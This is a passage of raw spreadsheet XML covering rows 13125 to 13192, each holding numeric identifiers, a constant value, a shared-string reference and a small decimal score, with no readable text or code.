      </c>
      <c r="D13125" s="2">
        <v>1.0</v>
      </c>
      <c r="E13125" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13125" s="2">
        <v>0.1062378167641325</v>
      </c>
    </row>
    <row r="13126" ht="15.75" customHeight="1">
      <c r="A13126" s="1">
        <v>7772.0</v>
      </c>
      <c r="B13126" s="2">
        <v>5.2143894E7</v>
      </c>
      <c r="C13126" s="2" t="s">
        <v>12627</v>
      </c>
      <c r="D13126" s="2">
        <v>1.0</v>
      </c>
      <c r="E13126" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13126" s="2">
        <v>0.1061507936507937</v>
      </c>
    </row>
    <row r="13127" ht="15.75" customHeight="1">
      <c r="A13127" s="1">
        <v>5292.0</v>
      </c>
      <c r="B13127" s="2">
        <v>4.5214704E7</v>
      </c>
      <c r="C13127" s="2" t="s">
        <v>12628</v>
      </c>
      <c r="D13127" s="2">
        <v>1.0</v>
      </c>
      <c r="E13127" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13127" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13128" ht="15.75" customHeight="1">
      <c r="A13128" s="1">
        <v>7239.0</v>
      </c>
      <c r="B13128" s="2">
        <v>5.0679234E7</v>
      </c>
      <c r="C13128" s="2" t="s">
        <v>12629</v>
      </c>
      <c r="D13128" s="2">
        <v>1.0</v>
      </c>
      <c r="E13128" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13128" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13129" ht="15.75" customHeight="1">
      <c r="A13129" s="1">
        <v>7419.0</v>
      </c>
      <c r="B13129" s="2">
        <v>5.1142982E7</v>
      </c>
      <c r="C13129" s="2" t="s">
        <v>12630</v>
      </c>
      <c r="D13129" s="2">
        <v>1.0</v>
      </c>
      <c r="E13129" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13129" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13130" ht="15.75" customHeight="1">
      <c r="A13130" s="1">
        <v>9131.0</v>
      </c>
      <c r="B13130" s="2">
        <v>5.5229632E7</v>
      </c>
      <c r="C13130" s="2" t="s">
        <v>12631</v>
      </c>
      <c r="D13130" s="2">
        <v>1.0</v>
      </c>
      <c r="E13130" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13130" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13131" ht="15.75" customHeight="1">
      <c r="A13131" s="1">
        <v>15294.0</v>
      </c>
      <c r="B13131" s="2">
        <v>4.2424764E7</v>
      </c>
      <c r="C13131" s="2" t="s">
        <v>12632</v>
      </c>
      <c r="D13131" s="2">
        <v>1.0</v>
      </c>
      <c r="E13131" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13131" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13132" ht="15.75" customHeight="1">
      <c r="A13132" s="1">
        <v>33682.0</v>
      </c>
      <c r="B13132" s="2">
        <v>8434282.0</v>
      </c>
      <c r="C13132" s="2" t="s">
        <v>12633</v>
      </c>
      <c r="D13132" s="2">
        <v>1.0</v>
      </c>
      <c r="E13132" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13132" s="2">
        <v>0.1061507936507936</v>
      </c>
    </row>
    <row r="13133" ht="15.75" customHeight="1">
      <c r="A13133" s="1">
        <v>5902.0</v>
      </c>
      <c r="B13133" s="2">
        <v>4.7185003E7</v>
      </c>
      <c r="C13133" s="2" t="s">
        <v>12634</v>
      </c>
      <c r="D13133" s="2">
        <v>1.0</v>
      </c>
      <c r="E13133" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13133" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13134" ht="15.75" customHeight="1">
      <c r="A13134" s="1">
        <v>6274.0</v>
      </c>
      <c r="B13134" s="2">
        <v>4.8138397E7</v>
      </c>
      <c r="C13134" s="2" t="s">
        <v>12635</v>
      </c>
      <c r="D13134" s="2">
        <v>1.0</v>
      </c>
      <c r="E13134" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13134" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13135" ht="15.75" customHeight="1">
      <c r="A13135" s="1">
        <v>8088.0</v>
      </c>
      <c r="B13135" s="2">
        <v>5.3040984E7</v>
      </c>
      <c r="C13135" s="2" t="s">
        <v>12636</v>
      </c>
      <c r="D13135" s="2">
        <v>1.0</v>
      </c>
      <c r="E13135" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13135" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13136" ht="15.75" customHeight="1">
      <c r="A13136" s="1">
        <v>9327.0</v>
      </c>
      <c r="B13136" s="2">
        <v>5.5588617E7</v>
      </c>
      <c r="C13136" s="2" t="s">
        <v>12637</v>
      </c>
      <c r="D13136" s="2">
        <v>1.0</v>
      </c>
      <c r="E13136" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13136" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13137" ht="15.75" customHeight="1">
      <c r="A13137" s="1">
        <v>9506.0</v>
      </c>
      <c r="B13137" s="2">
        <v>5.5946876E7</v>
      </c>
      <c r="C13137" s="2" t="s">
        <v>12638</v>
      </c>
      <c r="D13137" s="2">
        <v>1.0</v>
      </c>
      <c r="E13137" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13137" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13138" ht="15.75" customHeight="1">
      <c r="A13138" s="1">
        <v>10189.0</v>
      </c>
      <c r="B13138" s="2">
        <v>5.7391813E7</v>
      </c>
      <c r="C13138" s="2" t="s">
        <v>12639</v>
      </c>
      <c r="D13138" s="2">
        <v>1.0</v>
      </c>
      <c r="E13138" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13138" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13139" ht="15.75" customHeight="1">
      <c r="A13139" s="1">
        <v>13873.0</v>
      </c>
      <c r="B13139" s="2">
        <v>3.6965571E7</v>
      </c>
      <c r="C13139" s="2" t="s">
        <v>12640</v>
      </c>
      <c r="D13139" s="2">
        <v>1.0</v>
      </c>
      <c r="E13139" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13139" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13140" ht="15.75" customHeight="1">
      <c r="A13140" s="1">
        <v>21618.0</v>
      </c>
      <c r="B13140" s="2">
        <v>2.4571538E7</v>
      </c>
      <c r="C13140" s="2" t="s">
        <v>12641</v>
      </c>
      <c r="D13140" s="2">
        <v>1.0</v>
      </c>
      <c r="E13140" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13140" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13141" ht="15.75" customHeight="1">
      <c r="A13141" s="1">
        <v>23530.0</v>
      </c>
      <c r="B13141" s="2">
        <v>5904957.0</v>
      </c>
      <c r="C13141" s="2" t="s">
        <v>12642</v>
      </c>
      <c r="D13141" s="2">
        <v>1.0</v>
      </c>
      <c r="E13141" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13141" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13142" ht="15.75" customHeight="1">
      <c r="A13142" s="1">
        <v>24992.0</v>
      </c>
      <c r="B13142" s="2">
        <v>1.2688088E7</v>
      </c>
      <c r="C13142" s="2" t="s">
        <v>12643</v>
      </c>
      <c r="D13142" s="2">
        <v>1.0</v>
      </c>
      <c r="E13142" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13142" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13143" ht="15.75" customHeight="1">
      <c r="A13143" s="1">
        <v>26087.0</v>
      </c>
      <c r="B13143" s="2">
        <v>1.5657866E7</v>
      </c>
      <c r="C13143" s="2" t="s">
        <v>12644</v>
      </c>
      <c r="D13143" s="2">
        <v>1.0</v>
      </c>
      <c r="E13143" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13143" s="2">
        <v>0.106060606060606</v>
      </c>
    </row>
    <row r="13144" ht="15.75" customHeight="1">
      <c r="A13144" s="1">
        <v>3931.0</v>
      </c>
      <c r="B13144" s="2">
        <v>4.0579494E7</v>
      </c>
      <c r="C13144" s="2" t="s">
        <v>12645</v>
      </c>
      <c r="D13144" s="2">
        <v>1.0</v>
      </c>
      <c r="E13144" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13144" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="13145" ht="15.75" customHeight="1">
      <c r="A13145" s="1">
        <v>5903.0</v>
      </c>
      <c r="B13145" s="2">
        <v>4.7185003E7</v>
      </c>
      <c r="C13145" s="2" t="s">
        <v>12646</v>
      </c>
      <c r="D13145" s="2">
        <v>1.0</v>
      </c>
      <c r="E13145" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13145" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="13146" ht="15.75" customHeight="1">
      <c r="A13146" s="1">
        <v>5911.0</v>
      </c>
      <c r="B13146" s="2">
        <v>4.7202668E7</v>
      </c>
      <c r="C13146" s="2" t="s">
        <v>12647</v>
      </c>
      <c r="D13146" s="2">
        <v>1.0</v>
      </c>
      <c r="E13146" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13146" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="13147" ht="15.75" customHeight="1">
      <c r="A13147" s="1">
        <v>18271.0</v>
      </c>
      <c r="B13147" s="2">
        <v>5.2215796E7</v>
      </c>
      <c r="C13147" s="2" t="s">
        <v>12648</v>
      </c>
      <c r="D13147" s="2">
        <v>1.0</v>
      </c>
      <c r="E13147" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13147" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="13148" ht="15.75" customHeight="1">
      <c r="A13148" s="1">
        <v>27399.0</v>
      </c>
      <c r="B13148" s="2">
        <v>2.1801293E7</v>
      </c>
      <c r="C13148" s="2" t="s">
        <v>12649</v>
      </c>
      <c r="D13148" s="2">
        <v>1.0</v>
      </c>
      <c r="E13148" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13148" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="13149" ht="15.75" customHeight="1">
      <c r="A13149" s="1">
        <v>4535.0</v>
      </c>
      <c r="B13149" s="2">
        <v>4.2659056E7</v>
      </c>
      <c r="C13149" s="2" t="s">
        <v>12650</v>
      </c>
      <c r="D13149" s="2">
        <v>1.0</v>
      </c>
      <c r="E13149" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13149" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="13150" ht="15.75" customHeight="1">
      <c r="A13150" s="1">
        <v>6752.0</v>
      </c>
      <c r="B13150" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C13150" s="2" t="s">
        <v>12651</v>
      </c>
      <c r="D13150" s="2">
        <v>1.0</v>
      </c>
      <c r="E13150" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13150" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="13151" ht="15.75" customHeight="1">
      <c r="A13151" s="1">
        <v>28424.0</v>
      </c>
      <c r="B13151" s="2">
        <v>2.6408119E7</v>
      </c>
      <c r="C13151" s="2" t="s">
        <v>12652</v>
      </c>
      <c r="D13151" s="2">
        <v>1.0</v>
      </c>
      <c r="E13151" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13151" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="13152" ht="15.75" customHeight="1">
      <c r="A13152" s="1">
        <v>2586.0</v>
      </c>
      <c r="B13152" s="2">
        <v>3.4322965E7</v>
      </c>
      <c r="C13152" s="2" t="s">
        <v>12653</v>
      </c>
      <c r="D13152" s="2">
        <v>1.0</v>
      </c>
      <c r="E13152" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13152" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="13153" ht="15.75" customHeight="1">
      <c r="A13153" s="1">
        <v>730.0</v>
      </c>
      <c r="B13153" s="2">
        <v>2.0794796E7</v>
      </c>
      <c r="C13153" s="2" t="s">
        <v>12654</v>
      </c>
      <c r="D13153" s="2">
        <v>1.0</v>
      </c>
      <c r="E13153" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13153" s="2">
        <v>0.1048387096774194</v>
      </c>
    </row>
    <row r="13154" ht="15.75" customHeight="1">
      <c r="A13154" s="1">
        <v>6899.0</v>
      </c>
      <c r="B13154" s="2">
        <v>4.9804514E7</v>
      </c>
      <c r="C13154" s="2" t="s">
        <v>12655</v>
      </c>
      <c r="D13154" s="2">
        <v>1.0</v>
      </c>
      <c r="E13154" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13154" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="13155" ht="15.75" customHeight="1">
      <c r="A13155" s="1">
        <v>20951.0</v>
      </c>
      <c r="B13155" s="2">
        <v>1.6621759E7</v>
      </c>
      <c r="C13155" s="2" t="s">
        <v>12656</v>
      </c>
      <c r="D13155" s="2">
        <v>1.0</v>
      </c>
      <c r="E13155" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13155" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="13156" ht="15.75" customHeight="1">
      <c r="A13156" s="1">
        <v>22528.0</v>
      </c>
      <c r="B13156" s="2">
        <v>3.7733047E7</v>
      </c>
      <c r="C13156" s="2" t="s">
        <v>12657</v>
      </c>
      <c r="D13156" s="2">
        <v>1.0</v>
      </c>
      <c r="E13156" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13156" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="13157" ht="15.75" customHeight="1">
      <c r="A13157" s="1">
        <v>33244.0</v>
      </c>
      <c r="B13157" s="2">
        <v>7303601.0</v>
      </c>
      <c r="C13157" s="2" t="s">
        <v>12658</v>
      </c>
      <c r="D13157" s="2">
        <v>1.0</v>
      </c>
      <c r="E13157" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13157" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="13158" ht="15.75" customHeight="1">
      <c r="A13158" s="1">
        <v>1145.0</v>
      </c>
      <c r="B13158" s="2">
        <v>2.4289022E7</v>
      </c>
      <c r="C13158" s="2" t="s">
        <v>12659</v>
      </c>
      <c r="D13158" s="2">
        <v>1.0</v>
      </c>
      <c r="E13158" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13158" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13159" ht="15.75" customHeight="1">
      <c r="A13159" s="1">
        <v>1253.0</v>
      </c>
      <c r="B13159" s="2">
        <v>2.5189344E7</v>
      </c>
      <c r="C13159" s="2" t="s">
        <v>12660</v>
      </c>
      <c r="D13159" s="2">
        <v>1.0</v>
      </c>
      <c r="E13159" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13159" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13160" ht="15.75" customHeight="1">
      <c r="A13160" s="1">
        <v>3590.0</v>
      </c>
      <c r="B13160" s="2">
        <v>3.9037503E7</v>
      </c>
      <c r="C13160" s="2" t="s">
        <v>12661</v>
      </c>
      <c r="D13160" s="2">
        <v>1.0</v>
      </c>
      <c r="E13160" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13160" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13161" ht="15.75" customHeight="1">
      <c r="A13161" s="1">
        <v>3942.0</v>
      </c>
      <c r="B13161" s="2">
        <v>4.0616928E7</v>
      </c>
      <c r="C13161" s="2" t="s">
        <v>12662</v>
      </c>
      <c r="D13161" s="2">
        <v>1.0</v>
      </c>
      <c r="E13161" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13161" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13162" ht="15.75" customHeight="1">
      <c r="A13162" s="1">
        <v>5025.0</v>
      </c>
      <c r="B13162" s="2">
        <v>4.423658E7</v>
      </c>
      <c r="C13162" s="2" t="s">
        <v>12663</v>
      </c>
      <c r="D13162" s="2">
        <v>1.0</v>
      </c>
      <c r="E13162" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13162" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13163" ht="15.75" customHeight="1">
      <c r="A13163" s="1">
        <v>6247.0</v>
      </c>
      <c r="B13163" s="2">
        <v>4.810249E7</v>
      </c>
      <c r="C13163" s="2" t="s">
        <v>12664</v>
      </c>
      <c r="D13163" s="2">
        <v>1.0</v>
      </c>
      <c r="E13163" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13163" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13164" ht="15.75" customHeight="1">
      <c r="A13164" s="1">
        <v>7675.0</v>
      </c>
      <c r="B13164" s="2">
        <v>5.1906646E7</v>
      </c>
      <c r="C13164" s="2" t="s">
        <v>12665</v>
      </c>
      <c r="D13164" s="2">
        <v>1.0</v>
      </c>
      <c r="E13164" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13164" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13165" ht="15.75" customHeight="1">
      <c r="A13165" s="1">
        <v>9494.0</v>
      </c>
      <c r="B13165" s="2">
        <v>5.5917992E7</v>
      </c>
      <c r="C13165" s="2" t="s">
        <v>12666</v>
      </c>
      <c r="D13165" s="2">
        <v>1.0</v>
      </c>
      <c r="E13165" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13165" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13166" ht="15.75" customHeight="1">
      <c r="A13166" s="1">
        <v>11823.0</v>
      </c>
      <c r="B13166" s="2">
        <v>2.4636152E7</v>
      </c>
      <c r="C13166" s="2" t="s">
        <v>12667</v>
      </c>
      <c r="D13166" s="2">
        <v>1.0</v>
      </c>
      <c r="E13166" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13166" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13167" ht="15.75" customHeight="1">
      <c r="A13167" s="1">
        <v>14096.0</v>
      </c>
      <c r="B13167" s="2">
        <v>3.7744642E7</v>
      </c>
      <c r="C13167" s="2" t="s">
        <v>12668</v>
      </c>
      <c r="D13167" s="2">
        <v>1.0</v>
      </c>
      <c r="E13167" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13167" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13168" ht="15.75" customHeight="1">
      <c r="A13168" s="1">
        <v>14936.0</v>
      </c>
      <c r="B13168" s="2">
        <v>4.1248939E7</v>
      </c>
      <c r="C13168" s="2" t="s">
        <v>12669</v>
      </c>
      <c r="D13168" s="2">
        <v>1.0</v>
      </c>
      <c r="E13168" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13168" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13169" ht="15.75" customHeight="1">
      <c r="A13169" s="1">
        <v>16544.0</v>
      </c>
      <c r="B13169" s="2">
        <v>4.6803127E7</v>
      </c>
      <c r="C13169" s="2" t="s">
        <v>12670</v>
      </c>
      <c r="D13169" s="2">
        <v>1.0</v>
      </c>
      <c r="E13169" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13169" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13170" ht="15.75" customHeight="1">
      <c r="A13170" s="1">
        <v>17677.0</v>
      </c>
      <c r="B13170" s="2">
        <v>5.048974E7</v>
      </c>
      <c r="C13170" s="2" t="s">
        <v>12671</v>
      </c>
      <c r="D13170" s="2">
        <v>1.0</v>
      </c>
      <c r="E13170" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13170" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13171" ht="15.75" customHeight="1">
      <c r="A13171" s="1">
        <v>17894.0</v>
      </c>
      <c r="B13171" s="2">
        <v>5.1064576E7</v>
      </c>
      <c r="C13171" s="2" t="s">
        <v>12672</v>
      </c>
      <c r="D13171" s="2">
        <v>1.0</v>
      </c>
      <c r="E13171" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13171" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13172" ht="15.75" customHeight="1">
      <c r="A13172" s="1">
        <v>18095.0</v>
      </c>
      <c r="B13172" s="2">
        <v>5.1693322E7</v>
      </c>
      <c r="C13172" s="2" t="s">
        <v>12673</v>
      </c>
      <c r="D13172" s="2">
        <v>1.0</v>
      </c>
      <c r="E13172" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13172" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13173" ht="15.75" customHeight="1">
      <c r="A13173" s="1">
        <v>19987.0</v>
      </c>
      <c r="B13173" s="2">
        <v>5.7628275E7</v>
      </c>
      <c r="C13173" s="2" t="s">
        <v>12674</v>
      </c>
      <c r="D13173" s="2">
        <v>1.0</v>
      </c>
      <c r="E13173" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13173" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13174" ht="15.75" customHeight="1">
      <c r="A13174" s="1">
        <v>21177.0</v>
      </c>
      <c r="B13174" s="2">
        <v>1.9159215E7</v>
      </c>
      <c r="C13174" s="2" t="s">
        <v>12675</v>
      </c>
      <c r="D13174" s="2">
        <v>1.0</v>
      </c>
      <c r="E13174" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13174" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13175" ht="15.75" customHeight="1">
      <c r="A13175" s="1">
        <v>22195.0</v>
      </c>
      <c r="B13175" s="2">
        <v>3.1878333E7</v>
      </c>
      <c r="C13175" s="2" t="s">
        <v>12676</v>
      </c>
      <c r="D13175" s="2">
        <v>1.0</v>
      </c>
      <c r="E13175" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13175" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13176" ht="15.75" customHeight="1">
      <c r="A13176" s="1">
        <v>26444.0</v>
      </c>
      <c r="B13176" s="2">
        <v>1.7277545E7</v>
      </c>
      <c r="C13176" s="2" t="s">
        <v>12677</v>
      </c>
      <c r="D13176" s="2">
        <v>1.0</v>
      </c>
      <c r="E13176" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13176" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13177" ht="15.75" customHeight="1">
      <c r="A13177" s="1">
        <v>26816.0</v>
      </c>
      <c r="B13177" s="2">
        <v>1.8751421E7</v>
      </c>
      <c r="C13177" s="2" t="s">
        <v>12678</v>
      </c>
      <c r="D13177" s="2">
        <v>1.0</v>
      </c>
      <c r="E13177" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13177" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13178" ht="15.75" customHeight="1">
      <c r="A13178" s="1">
        <v>27745.0</v>
      </c>
      <c r="B13178" s="2">
        <v>2.3082224E7</v>
      </c>
      <c r="C13178" s="2" t="s">
        <v>12679</v>
      </c>
      <c r="D13178" s="2">
        <v>1.0</v>
      </c>
      <c r="E13178" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13178" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13179" ht="15.75" customHeight="1">
      <c r="A13179" s="1">
        <v>27934.0</v>
      </c>
      <c r="B13179" s="2">
        <v>2.3792888E7</v>
      </c>
      <c r="C13179" s="2" t="s">
        <v>12680</v>
      </c>
      <c r="D13179" s="2">
        <v>1.0</v>
      </c>
      <c r="E13179" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13179" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13180" ht="15.75" customHeight="1">
      <c r="A13180" s="1">
        <v>28245.0</v>
      </c>
      <c r="B13180" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C13180" s="2" t="s">
        <v>12681</v>
      </c>
      <c r="D13180" s="2">
        <v>1.0</v>
      </c>
      <c r="E13180" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13180" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13181" ht="15.75" customHeight="1">
      <c r="A13181" s="1">
        <v>29386.0</v>
      </c>
      <c r="B13181" s="2">
        <v>3.1878332E7</v>
      </c>
      <c r="C13181" s="2" t="s">
        <v>12676</v>
      </c>
      <c r="D13181" s="2">
        <v>1.0</v>
      </c>
      <c r="E13181" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13181" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13182" ht="15.75" customHeight="1">
      <c r="A13182" s="1">
        <v>29768.0</v>
      </c>
      <c r="B13182" s="2">
        <v>3.4883471E7</v>
      </c>
      <c r="C13182" s="2" t="s">
        <v>12682</v>
      </c>
      <c r="D13182" s="2">
        <v>1.0</v>
      </c>
      <c r="E13182" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13182" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13183" ht="15.75" customHeight="1">
      <c r="A13183" s="1">
        <v>33517.0</v>
      </c>
      <c r="B13183" s="2">
        <v>8085608.0</v>
      </c>
      <c r="C13183" s="2" t="s">
        <v>12683</v>
      </c>
      <c r="D13183" s="2">
        <v>1.0</v>
      </c>
      <c r="E13183" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13183" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="13184" ht="15.75" customHeight="1">
      <c r="A13184" s="1">
        <v>3524.0</v>
      </c>
      <c r="B13184" s="2">
        <v>3.8608789E7</v>
      </c>
      <c r="C13184" s="2" t="s">
        <v>12684</v>
      </c>
      <c r="D13184" s="2">
        <v>1.0</v>
      </c>
      <c r="E13184" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13184" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="13185" ht="15.75" customHeight="1">
      <c r="A13185" s="1">
        <v>4261.0</v>
      </c>
      <c r="B13185" s="2">
        <v>4.1834637E7</v>
      </c>
      <c r="C13185" s="2" t="s">
        <v>12685</v>
      </c>
      <c r="D13185" s="2">
        <v>1.0</v>
      </c>
      <c r="E13185" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13185" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="13186" ht="15.75" customHeight="1">
      <c r="A13186" s="1">
        <v>10954.0</v>
      </c>
      <c r="B13186" s="2">
        <v>1.7124671E7</v>
      </c>
      <c r="C13186" s="2" t="s">
        <v>12686</v>
      </c>
      <c r="D13186" s="2">
        <v>1.0</v>
      </c>
      <c r="E13186" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13186" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="13187" ht="15.75" customHeight="1">
      <c r="A13187" s="1">
        <v>24350.0</v>
      </c>
      <c r="B13187" s="2">
        <v>1.0717699E7</v>
      </c>
      <c r="C13187" s="2" t="s">
        <v>12687</v>
      </c>
      <c r="D13187" s="2">
        <v>1.0</v>
      </c>
      <c r="E13187" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13187" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="13188" ht="15.75" customHeight="1">
      <c r="A13188" s="1">
        <v>32375.0</v>
      </c>
      <c r="B13188" s="2">
        <v>5606495.0</v>
      </c>
      <c r="C13188" s="2" t="s">
        <v>12688</v>
      </c>
      <c r="D13188" s="2">
        <v>1.0</v>
      </c>
      <c r="E13188" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13188" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="13189" ht="15.75" customHeight="1">
      <c r="A13189" s="1">
        <v>2478.0</v>
      </c>
      <c r="B13189" s="2">
        <v>3.3852295E7</v>
      </c>
      <c r="C13189" s="2" t="s">
        <v>12689</v>
      </c>
      <c r="D13189" s="2">
        <v>1.0</v>
      </c>
      <c r="E13189" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13189" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13190" ht="15.75" customHeight="1">
      <c r="A13190" s="1">
        <v>8439.0</v>
      </c>
      <c r="B13190" s="2">
        <v>5.3958839E7</v>
      </c>
      <c r="C13190" s="2" t="s">
        <v>12690</v>
      </c>
      <c r="D13190" s="2">
        <v>1.0</v>
      </c>
      <c r="E13190" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13190" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13191" ht="15.75" customHeight="1">
      <c r="A13191" s="1">
        <v>9349.0</v>
      </c>
      <c r="B13191" s="2">
        <v>5.5661894E7</v>
      </c>
      <c r="C13191" s="2" t="s">
        <v>12691</v>
      </c>
      <c r="D13191" s="2">
        <v>1.0</v>
      </c>
      <c r="E13191" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13191" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13192" ht="15.75" customHeight="1">
      <c r="A13192" s="1">
        <v>16440.0</v>
      </c>
      <c r="B13192" s="2">
        <v>4.6383901E7</v>
      </c>
      <c r="C13192" s="2" t="s">
        <v>12692</v>
      </c>
